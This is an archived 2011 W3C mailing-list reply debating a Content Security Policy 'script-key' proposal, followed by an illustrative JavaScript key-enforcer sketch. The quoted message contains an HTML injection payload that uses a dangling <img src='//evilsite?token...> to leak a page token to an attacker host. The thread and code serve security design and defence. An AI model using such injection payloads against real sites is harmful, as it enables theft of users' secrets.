
Re: [Content Security Policy] Proposal to move the debate forward

From: Gervase Markham <gerv@mozilla.org>
Date: Fri, 28 Jan 2011 11:04:10 +0000
Message-ID: <4D42A2AA.3030908@mozilla.org>
To: gaz Heyes <gazheyes@gmail.com>
CC: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
On 28/01/11 10:54, gaz Heyes wrote:
> You want an automatic attack? Ok. I'm really clueless as to why you don't
> get this. I said there are many ways. <img src='//evilsite?token please=
> Initiated by a <iframe src="//cspsite?injection=<img
> src='//evilsite?token please=" onload="setTimeout(function(){
> readKey();doJSInjection(); }, 10000)"></iframe>

Still don't get it, sorry :-( If you inject the <img src= etc. into the 
CSP site using script-key, your onload won't run because it doesn't have 
the script-key in the script text.

You need the key to run any script in the page context. _Any_ script - 
event handlers, in-page, external. Apart from your suggestion of 
managing to get a form submitted with a chunk of page HTML in the form 
data, then you need script to get the key. Catch 22.

Gerv
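As an added illustration of the point Gerv is making (this is example code, not code from the thread or from any CSP implementation): a toy "script-key" enforcer that walks a page's inline scripts and event-handler attributes and permits only those whose text carries the page's key. It assumes a key prefix format of `key:<KEY>;`, since this message does not give the proposal's actual syntax.

```javascript
// ASSUMED key format: a permitted script body (inline <script> or on* handler)
// must begin with "key:<KEY>;". The real proposal's syntax is not in the thread.
const KEY_RE = /^\s*key:([A-Za-z0-9]+);/;

// Collect candidate script sources from a page: inline <script> bodies and
// on* event-handler attribute values. Regex-based, sufficient for this demo.
function extractScripts(html) {
  const found = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const handlerRe = /\son([a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    found.push({ kind: 'inline', text: m[1] });
  }
  while ((m = handlerRe.exec(html)) !== null) {
    found.push({ kind: 'on' + m[1], text: m[2] !== undefined ? m[2] : m[3] });
  }
  return found;
}

// A script runs only if its text starts with the key issued for this page.
function enforce(html, pageKey) {
  return extractScripts(html).map(s => {
    const m = KEY_RE.exec(s.text);
    return { kind: s.kind, allowed: m !== null && m[1] === pageKey, text: s.text.trim() };
  });
}

// Constructed sample: the page's own inline script carries the key; the
// injected <img onload=...> from the quoted message does not, so it is blocked
// before it could ever run and read the key.
const PAGE_KEY = 'k7f3q9'; // constructed; in practice a fresh per-response secret
const SAMPLE_PAGE = `
<script>key:${PAGE_KEY}; initApp();</script>
<p>Hello</p>
<img src='//evilsite?token please=' onload="setTimeout(function(){ readKey(); }, 10000)">
`;

function demo() {
  return enforce(SAMPLE_PAGE, PAGE_KEY);
}
```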
Received on Friday, 28 January 2011 11:04:49 GMT
